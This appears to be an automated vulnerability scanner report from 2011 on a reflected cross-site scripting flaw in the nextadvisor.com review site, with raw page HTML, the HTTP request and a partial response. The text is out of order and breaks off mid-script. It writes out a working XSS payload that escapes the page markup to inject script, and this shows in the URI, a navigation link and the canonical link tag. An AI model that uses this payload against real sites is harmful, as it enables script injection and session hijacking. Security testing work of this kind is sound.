VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003FE)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000414)%3C/script%3E

/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000414)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000414)%3C/s..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000414)</script>

Request

GET /images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000414)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/images/favicon.ico
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 04:00:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3523
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/images/'"--></style></script><script>netsparker(0x000414)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(lin